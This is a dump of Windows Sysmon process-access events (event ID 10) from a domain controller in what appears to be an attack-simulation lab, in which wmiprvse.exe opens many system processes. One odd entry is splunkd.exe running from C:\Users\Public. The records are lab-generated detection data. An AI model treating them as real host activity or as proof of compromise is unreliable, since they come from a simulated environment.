16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:36.780{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 